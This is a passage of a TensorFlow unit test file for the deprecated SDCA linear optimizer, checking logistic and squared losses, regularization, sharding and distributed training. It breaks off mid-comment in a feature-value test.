sdca_ops_test.py
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SdcaModel (deprecated).
This module and all its submodules are deprecated. To UPDATE or USE linear
optimizers, please check its latest version in core:
tensorflow_estimator/python/estimator/canned/linear_optimizer/.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
from tensorflow.contrib.linear_optimizer.python.ops.sdca_ops import SdcaModel
from tensorflow.contrib.linear_optimizer.python.ops.sparse_feature_column import SparseFeatureColumn
from tensorflow.core.example import example_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_sdca_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import googletest
_MAX_ITERATIONS = 100
_SHARD_NUMBERS = [None, 1, 3]
_NUM_LOSS_PARTITIONS = [4]
def make_example_proto(feature_dict, target, value=1.0):
e = example_pb2.Example()
features = e.features
features.feature['target'].float_list.value.append(target)
for key, values in feature_dict.items():
features.feature[key + '_indices'].int64_list.value.extend(values)
features.feature[key + '_values'].float_list.value.extend([value] *
len(values))
return e
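# Illustrative sketch of the proto built by a single call above (field names taken
# from the construction code; the concrete layout is an assumption, not a dump of a
# real run):
#   make_example_proto({'age': [0], 'gender': [0]}, 0) yields an Example whose
#   features map holds
#     'target'         -> float_list [0.0]
#     'age_indices'    -> int64_list [0]
#     'age_values'     -> float_list [1.0]
#     'gender_indices' -> int64_list [0]
#     'gender_values'  -> float_list [1.0]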
def make_example_dict(example_protos, example_weights):
def parse_examples(example_protos):
features = {
'target':
parsing_ops.FixedLenFeature(
shape=[1], dtype=dtypes.float32, default_value=0),
'age_indices':
parsing_ops.VarLenFeature(dtype=dtypes.int64),
'age_values':
parsing_ops.VarLenFeature(dtype=dtypes.float32),
'gender_indices':
parsing_ops.VarLenFeature(dtype=dtypes.int64),
'gender_values':
parsing_ops.VarLenFeature(dtype=dtypes.float32)
}
return parsing_ops.parse_example(
[e.SerializeToString() for e in example_protos], features)
parsed = parse_examples(example_protos)
sparse_features = [
SparseFeatureColumn(
array_ops.reshape(
array_ops.split(
value=parsed['age_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
array_ops.reshape(parsed['age_indices'].values, [-1]),
array_ops.reshape(parsed['age_values'].values, [-1])),
SparseFeatureColumn(
array_ops.reshape(
array_ops.split(
value=parsed['gender_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
array_ops.reshape(parsed['gender_indices'].values, [-1]),
array_ops.reshape(parsed['gender_values'].values, [-1]))
]
return dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=example_weights,
example_labels=array_ops.reshape(parsed['target'], [-1]),
example_ids=['%d' % i for i in range(0, len(example_protos))])
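# Reading of the SparseFeatureColumn triplets assembled above (an interpretation of
# the parsing code, not an authoritative description of the op):
#   - example indices: the first column of parsed['*_indices'].indices, i.e. which
#     example each entry belongs to,
#   - feature indices: the stored int64 values, i.e. the feature ids themselves,
#   - feature values: the matching floats parsed from '*_values'.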
def make_random_examples_and_variables_dicts(num_examples, dim, num_non_zero):
random.seed(1)
sparse_features = [
SparseFeatureColumn(
[i for i in range(num_examples) for _ in range(num_non_zero)], [
i for _ in range(num_examples)
for i in random.sample(range(dim), num_non_zero)
],
[num_non_zero**(-0.5) for _ in range(num_examples * num_non_zero)])
]
examples_dict = dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=[random.random() for _ in range(num_examples)],
example_labels=[
1. if random.random() > 0.5 else 0. for _ in range(num_examples)
],
example_ids=[str(i) for i in range(num_examples)])
weights = variables_lib.VariableV1(
array_ops.zeros([dim], dtype=dtypes.float32))
variables_dict = dict(
sparse_features_weights=[weights],
dense_features_weights=[])
return examples_dict, variables_dict
def make_variable_dict(max_age, max_gender, num_shards=None, partitioned=False):
# TODO(sibyl-toe9oF2e): Figure out how to derive max_age & max_gender from
# examples_dict.
partitioner = None
if partitioned:
partitioner = partitioned_variables.fixed_size_partitioner(num_shards=2,
axis=0)
with variable_scope.variable_scope(
name_or_scope=('variables/shard_{}'.format(num_shards)
if num_shards else 'variables'),
partitioner=partitioner):
age_weights = variable_scope.get_variable(
name='age',
initializer=array_ops.zeros([max_age + 1], dtype=dtypes.float32))
gender_weights = variable_scope.get_variable(
name='gender',
initializer=array_ops.zeros([max_gender + 1], dtype=dtypes.float32))
return dict(
sparse_features_weights=[age_weights, gender_weights],
dense_features_weights=[])
def make_dense_examples_and_variables_dicts(dense_features_values, weights,
labels):
"""Creates examples and variables dictionaries for dense features.
Variables shapes are inferred from the list of dense feature values passed as
argument.
Args:
dense_features_values: The values of the dense features
weights: The example weights.
labels: The example labels.
Returns:
One dictionary for the examples and one for the variables.
"""
dense_tensors = []
dense_weights = []
for dense_feature in dense_features_values:
dense_tensor = ops.convert_to_tensor(dense_feature, dtype=dtypes.float32)
check_shape_op = control_flow_ops.Assert(
math_ops.less_equal(array_ops.rank(dense_tensor), 2),
['dense_tensor shape must be [batch_size, dimension] or [batch_size]'])
# Reshape to [batch_size, dense_column_dimension].
with ops.control_dependencies([check_shape_op]):
dense_tensor = array_ops.reshape(
dense_tensor, [dense_tensor.get_shape().as_list()[0], -1])
dense_tensors.append(dense_tensor)
# Add variables of shape [feature_column_dimension].
dense_weights.append(
variables_lib.VariableV1(
array_ops.zeros(
[dense_tensor.get_shape().as_list()[1]], dtype=dtypes.float32)))
examples_dict = dict(
sparse_features=[],
dense_features=dense_tensors,
example_weights=weights,
example_labels=labels,
example_ids=['%d' % i for i in range(0, len(labels))])
variables_dict = dict(
sparse_features_weights=[], dense_features_weights=dense_weights)
return examples_dict, variables_dict
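# Shape sketch for the helper above (inferred from the reshape logic, not from a
# run): dense_features_values=[[[1.0], [0.0]]] describes one dense feature column
# with batch_size=2 and dimension=1; every entry becomes a [batch_size, dimension]
# tensor plus a zero-initialized weight variable of shape [dimension].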
def get_binary_predictions_for_logistic(predictions, cutoff=0.5):
return math_ops.cast(
math_ops.greater_equal(predictions,
array_ops.ones_like(predictions) * cutoff),
dtype=dtypes.int32)
def get_binary_predictions_for_hinge(predictions):
return math_ops.cast(
math_ops.greater_equal(predictions, array_ops.zeros_like(predictions)),
dtype=dtypes.int32)
# TODO(sibyl-Mooth6ku): Add tests that exercise L1 and Shrinking.
# TODO(sibyl-vie3Poto): Refactor tests to avoid repetition of boilerplate code.
class SdcaModelTest(TensorFlowTestCase):
"""Base SDCA optimizer test class for any loss type."""
def _single_threaded_test_session(self):
config = config_pb2.ConfigProto(
inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
return self.test_session(use_gpu=False, config=config)
class SdcaWithLogisticLossTest(SdcaModelTest):
"""SDCA optimizer test class for logistic loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
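# Worked check of the initial losses asserted above: with all weights at zero the
# logistic prediction is sigmoid(0) = 0.5 for both examples, so each example
# contributes -log(0.5) = ln 2 ~= 0.693147, which is also the mean, and with zero
# weights the regularized loss equals the unregularized one.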
def testPartitionedPrimals(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards, partitioned=True)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSomePartitionedPrimals(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [0],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
# Explicitly make age a [1]-shaped Variable (which cannot be
# partitioned), while making gender a PartitionedVariable.
age_weights = variables_lib.VariableV1(
array_ops.zeros([1], dtype=dtypes.float32))
with variable_scope.variable_scope(
name_or_scope=('variables/shard_{}'.format(num_shards)
if num_shards else 'variables'),
partitioner=partitioned_variables.fixed_size_partitioner(
num_shards=2, axis=0)):
gender_weights = variable_scope.get_variable(
name='gender',
initializer=array_ops.zeros([2], dtype=dtypes.float32))
variables = dict(
sparse_features_weights=[age_weights, gender_weights],
dense_features_weights=[])
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.593014 is the optimal regularized_loss.
# 0.512591 is the unregularized_loss at that optimum.
self.assertAllClose(0.512591, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.593014, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSparseRandom(self):
dim = 20
num_examples = 1000
# Number of non-zero features per example.
non_zeros = 10
# Setup test data.
with self._single_threaded_test_session():
examples, variables = make_random_examples_and_variables_dicts(
num_examples, dim, non_zeros)
options = dict(
symmetric_l2_regularization=.1,
symmetric_l1_regularization=0,
num_table_shards=1,
adaptive=False,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
for _ in range(4):
train_op.run()
lr.update_weights(train_op).run()
# Duality gap is 1.4e-5.
# It would be 0.01 without shuffling and 0.02 with adaptive sampling.
self.assertNear(0.0, lr.approximate_duality_gap().eval(), err=1e-3)
def testSparseDuplicate(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0] * 5,
'gender': [0] * 5
}, 0),
make_example_proto({
'age': [1] * 5,
'gender': [1] * 5
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'Duplicate'):
train_op.run()
def testDistributedSimple(self):
# Distributed SDCA may not converge if the workers concurrently update the
# same example. In this test the examples are partitioned across workers:
# every worker sees the same examples, only the example_ids differ.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
examples = make_example_dict(example_protos, example_weights)
example_ids = array_ops.placeholder(
dtypes.string, shape=(len(example_weights),))
examples['example_ids'] = example_ids
variables = make_variable_dict(1, 1)
for num_shards in _SHARD_NUMBERS:
for num_loss_partitions in _NUM_LOSS_PARTITIONS:
with self._single_threaded_test_session():
options = dict(
# Keep the same solution as for testSimple: since the number of
# examples is multiplied by num_loss_partitions, also multiply
# L2 by the same value.
symmetric_l2_regularization=num_loss_partitions,
symmetric_l1_regularization=0,
loss_type='logistic_loss',
num_table_shards=num_shards,
num_loss_partitions=num_loss_partitions)
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
def minimize(worker_id):
with self._single_threaded_test_session():
feed_dict = {example_ids: [
str(i + worker_id*len(example_weights)) for i in range(
len(example_weights))]}
for _ in range(_MAX_ITERATIONS):
train_op.run(feed_dict=feed_dict) # pylint: disable=cell-var-from-loop
threads = []
for worker_id in range(num_loss_partitions):
threads.append(threading.Thread(target=minimize, args=(worker_id,)))
threads[-1].start()
for t in threads:
t.join()
lr.update_weights(train_op).run(feed_dict={
example_ids: [str(i) for i in range(len(example_weights))]})
# Test only the unregularized loss because the optimal value of the
# regularized loss depends on num_loss_partitions.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.02)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertNear(0.0, lr.approximate_duality_gap().eval(), 0.02)
def testSimpleNoL2(self):
# Same as test above (so comments from above apply) but without an L2.
# The algorithm should behave as if we have an L2 of 1 in optimization but
# 0 in regularized_loss.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=0,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# There is neither L1 nor L2 loss, so regularized and unregularized
# losses should be exactly the same.
self.assertAllClose(0.40244, unregularized_loss.eval(), atol=0.01)
self.assertAllClose(0.40244, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSomeUnweightedExamples(self):
# Setup test data with 4 examples, but should produce the same
# results as testSimple.
example_protos = [
# Will be used.
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 0),
# Will be used.
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 1),
]
example_weights = [1.0, 0.0, 1.0, 0.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
# Only use examples 0 and 2
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllClose([0, 1, 1, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testFractionalExampleLabel(self):
# Setup test data with 1 positive, and 1 mostly-negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0.1),
make_example_proto({
'age': [1],
'gender': [1]
}, 0.9),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
with self.assertRaisesOpError(
'Only labels of 0.0 or 1.0 are supported right now.'):
lr.minimize().run()
def testImbalanced(self):
# Setup test data with 1 positive, and 3 negative examples.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [2],
'gender': [0]
}, 0),
make_example_proto({
'age': [3],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(3, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(
0.226487 + 0.102902, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.328394 + 0.131364, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0, 0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testImbalancedWithExampleWeights(self):
# Setup test data with 1 positive, and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [3.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.284860, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.408044, loss.eval(), atol=0.012)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testInstancesOfOneClassOnly(self):
# Setup test data with 1 positive (ignored), and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [0]
}, 1), # Shares gender with the instance above.
]
example_weights = [1.0, 0.0] # Second example "omitted" from training.
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testOutOfRangeSparseFeatures(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(0, 0)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'indices.*'):
train_op.run()
def testOutOfRangeDenseFeatures(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[1.0, 0.0])
# Replace with a variable of size 1 instead of 2.
variables['dense_features_weights'] = [
variables_lib.VariableV1(array_ops.zeros(
[1], dtype=dtypes.float32))
]
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
'More dense features than we have parameters for.*'):
train_op.run()
# TODO(katsiaspis): add a test for the case when examples at the end of an
# epoch are repeated, since example id may be duplicated.
class SdcaWithLinearLossTest(SdcaModelTest):
"""SDCA optimizer test class for linear (squared) loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 2/3 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2
self.assertAllClose(
[-20.0 / 3.0, 28.0 / 3.0], predictions.eval(), rtol=0.005)
# Approximate gap should be very close to 0.0. (In fact, because the gap
# is only approximate, it is likely that upon convergence the duality gap
# can have a tiny negative value).
self.assertAllClose(0.0, lr.approximate_duality_gap().eval(), atol=1e-2)
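# Worked check of the 2/3-of-label claim above (reading the regularizer as
# (L2/2) * (w_age^2 + w_gender^2) with w_age = w_gender = w):
#   f(w) = (label - 2w)^2 / 2 + w^2,  f'(w) = -2(label - 2w) + 2w = 0  =>  w = label/3,
# so the prediction 2w = 2*label/3, i.e. -20/3 and 28/3 for labels -10 and 14.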
def testL2Regularization(self):
# Setup test data
example_protos = [
# 2 identical examples
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
# 2 more identical examples
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=16,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 1/5 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 + L2 * 16 * weight^2
optimal1 = -10.0 / 5.0
optimal2 = 14.0 / 5.0
self.assertAllClose(
[optimal1, optimal1, optimal2, optimal2],
predictions.eval(),
rtol=0.01)
def testL1Regularization(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=4.0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
prediction = lr.predictions(examples)
loss = lr.regularized_loss(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be -4.0, 20/3 due to minimizing regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2 + L1 * 4 * weight
self.assertAllClose([-4.0, 20.0 / 3.0], prediction.eval(), rtol=0.08)
# Loss should be the sum of the regularized loss value from above per
# example after plugging in the optimal weights.
self.assertAllClose(308.0 / 6.0, loss.eval(), atol=0.01)
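# Worked check of the prediction comment above (same per-pair reading as in
# testSimple, with the L1 term contributing 4 * (|w_age| + |w_gender|) = 8|w|):
#   label = 14, w > 0:  -2(14 - 2w) + 2w + 8 = 0  =>  w = 10/3, prediction 2w = 20/3,
#   label = -10, w < 0: -2(-10 - 2w) + 2w - 8 = 0  =>  w = -2,  prediction 2w = -4.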
def testFeatureValues(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0, -2.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0, 2.0),
]
example_weights = [5.0, 3.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# There are 4 (sparse) variable weights to be learned. 2 for age and 2 for
# gender. Let w_1, w_2 be age weights, w_3, w_4 be gender weights, y_1,
# y_2 be the labels for examples 1 and 2 respectively and s_1, s_2 the
# corresponding *example* weights. With the given feature values, the loss
# function is given by:
# s_1/2(y_1 + 2w_1 + 2w_3)^2 + s_2/2(y_2 - 2w_2 - 2w_4)^2
# + \lambda/2 (w_1^2 + w_2^2 + w_3^2 + w_4^2). Solving for the optimal, it
# can be verified that:
# w_1* = w_3* = -2.0 s_1 y_1/(\lambda + 8 s_1) and
# w_2* = w_4* = 2 \cdot s_2 y_2/(\lambda + 8 s_2). Equivalently, due to
